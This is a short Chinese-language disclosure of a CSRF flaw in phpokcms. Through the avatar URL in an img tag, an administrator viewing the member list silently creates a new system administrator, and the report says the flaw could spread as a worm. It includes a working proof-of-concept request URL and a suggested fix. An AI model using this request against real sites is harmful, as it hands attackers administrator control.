可蠕虫，可添加系统管理员。

phpokcms存在csrf漏洞，管理员查看会员列表时不知不觉会自动添加新的系统管理员。

位置在会员头像处的img标签，由于新闻评论可显示头像，也可蠕虫发评论。



下面仅证明添加管理员的部分。



具体代码分析了，直接poc。

注册会员后打开如下链接。（域名路径请视情况修改）

http://127.0.0.1/phpok/api.php?c=usercp&f=avatar&data=%2fphpok%2fadmin.php%3Fc%3Dadmin%26f%3Dsave%26id%3D%26account%3Dadmin2%26pass%3Dadmin2%26email%3Dadmin%2540a1.com%26status%3D1%26if_system%3D1


然后登录管理员后台，点击会员（此时一个名为admin2 密码为admin2的系统管理员已经添加成功。）


再打开设置，管理员维护去看一下即可。

修复方案：

修改设置头像接口，将url固定。 同时加强对关键功能的csrf控制，加入二次确认，或token。